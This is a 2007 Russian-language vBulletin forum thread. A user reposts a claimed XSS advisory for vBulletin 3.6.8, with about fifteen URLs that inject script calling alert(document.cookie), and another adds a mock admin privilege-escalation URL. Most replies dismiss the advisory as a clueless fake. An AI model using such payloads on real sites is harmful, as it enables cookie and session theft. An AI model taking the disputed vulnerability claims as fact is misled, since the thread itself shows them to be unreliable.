Файловый Архив

  • Неограниченное количество категорий и суб-категорий
  • Настройки прав доступа по группам
  • Настройки прав доступа по каждой категории
  • Предпросмотр медиа файлов: FLV, IFLV, F4A, F4V, MP4, MP3, MOV и других...
  • Мультизагрузка файлов - SWFUploader
  • Добавление файлов с сервера
Подробности и история обновлений продукта в этой теме
 
 
 
 

 
 
Здесь скоро опять что то будет...
 
 
 
 
 
 
Loading

Вернуться   форум vBSupport.org > vBulletin > Все версии vB

Объявления
  • Изменения в правах
  • Каталог Фрилансеров
  • Добро пожаловать!
  • Premoderation
  • Новичкам!
  • For English speaking users
Ответ
 
Опции темы Опции просмотра
Старый 14.08.2007, 14:18   #1
Простоузер
Exclamation XSS на vb 3.6.8.

Цитата:
Программа: vBulletin V3.6.8

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных во множестве сценариев множеством параметров. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

Код:
[site]/[path]/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=
all&titlesonly=0
Код:
[site]/[path]/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=1
Код:
[site]/[path]/index.php?s=<script>alert('document.cookie')</script>
Код:
[site]/[path]/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0
Код:
[site]/[path]/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2
Fscript&match=all&titlesonly=0
Код:
[site]/[path]/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0
Код:
[site]/[path]/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0
Код:
[site]/[path]/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3
Ealert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0
Код:
[site]/[path]/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0
Код:
[site]/[path]/forumdisplay.php?do=markread"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3E
alert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0
Код:
[site]/[path]/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0
Код:
[site]/[path]/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&
match=all&titlesonly=0
Код:
[site]/[path]/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&
match=all&titlesonly=0
Код:
[site]/[path]/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0
Код:
[site]/[path]/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0
Источник http://www.securitysib.com/2007/08/14/vbulletin.html

Кто что думает?
  Ответить с цитированием
Рекламка
Реклама на форуме

Файловый Архив

  • Неограниченное количество категорий и суб-категорий
  • Тонкие настройки прав доступа
  • Предпросмотр медиа файлов: FLV, IFLV, F4A, F4V, MP4, MP3, MOV и других...
  • Мультизагрузка файлов - SWFUploader
  • Добавление файлов с сервера
Подробности и история обновлений продукта в этой теме
Старый 14.08.2007, 14:20   #2
Proff
Знаток
 
Аватар для Proff
а в 3.6.7 её нету ?
  Ответить с цитированием
Старый 14.08.2007, 14:57   #3
netwind
Гуру
 
Аватар для netwind
чето бред какойто
где источник?
  Ответить с цитированием
Старый 14.08.2007, 15:26   #4
Malcolm Reed
Эксперт
 
Аватар для Malcolm Reed
Цитата:
Сообщение от netwind Посмотреть сообщение
чето бред какойто
+1
Цитата:
Сообщение от IchWill Посмотреть сообщение
&q=XSS
Такой приметив да в вобле? Я вас умоляю.
Цитата:
Сообщение от IchWill Посмотреть сообщение
u=1=s'&q=XSS
Бред больного поросенка =\

Вообще это из оперы "папа подключил мне инетку и я зашел на античат". Кто-то натыкал в урлы совершенно глупые строчки, не понимая что они вообще делают, и решил выдать это за уязвимость.
  Ответить с цитированием
Старый 14.08.2007, 16:14   #5
zCarot
zМарковь
Хочет третью строчку =)
 
Аватар для zCarot
чё думать ) пробуйте и убеждайтесь рабит иль нет )

Цитата:
Сообщение от IchWill Посмотреть сообщение
[site]/[path]/index.php?s=<script>alert('document.cookie')</script>
убило
  Ответить с цитированием
Старый 14.08.2007, 16:19   #6
zCarot
zМарковь
Хочет третью строчку =)
 
Аватар для zCarot
а во я ещё нашёл поднятие прав юзера с userid X до группы админов:
Код:
[site]/[path]/[path2admincp]/init.php?uid=1&sugid=6&suid=X
  Ответить с цитированием
Старый 19.08.2007, 07:57   #7
zl0
Простоузер
Ужас

это чо правда???? честно непойму :( на том сайте правда написано,ток незнаю правда ли на 3.6.8 работает
  Ответить с цитированием
Старый 19.08.2007, 14:29   #8
Hobot
Специалист
 
Аватар для Hobot
адрес сайта http://www.securitysib.com доверия не внушает.
он скорее похож на один из тысяч блого-сайто-варезо-хреней, типа фишек/зизы/etc
  Ответить с цитированием
Старый 26.08.2007, 18:43   #9
IchWill
Простоузер
Цитата:
адрес сайта http://www.securitysib.com доверия не внушает.
он скорее похож на один из тысяч блого-сайто-варезо-хреней, типа фишек/зизы/etc
один из тысяч блого-сайто-варезо-хреней, типа фишек/зизы/etc - http://securityvulns.ru/Rdocument840.html
и еще один не внушающий доверия сайт http://www.google.ru/search?q=vBulle...sword+Md5+Hash
  Ответить с цитированием
Старый 26.08.2007, 18:46   #10
zCarot
zМарковь
Хочет третью строчку =)
 
Аватар для zCarot
IchWill, чем больше по инету распространяется fake, тем больше мы видим сайтов, которые не проверяют информацию )
  Ответить с цитированием
Ответ

Закладки

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



 
 

Текущее время: 21:44 23.05.2012. Часовой пояс GMT +4.


Powered by vBulletin® Version 3.6.1
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd. Перевод: zCarot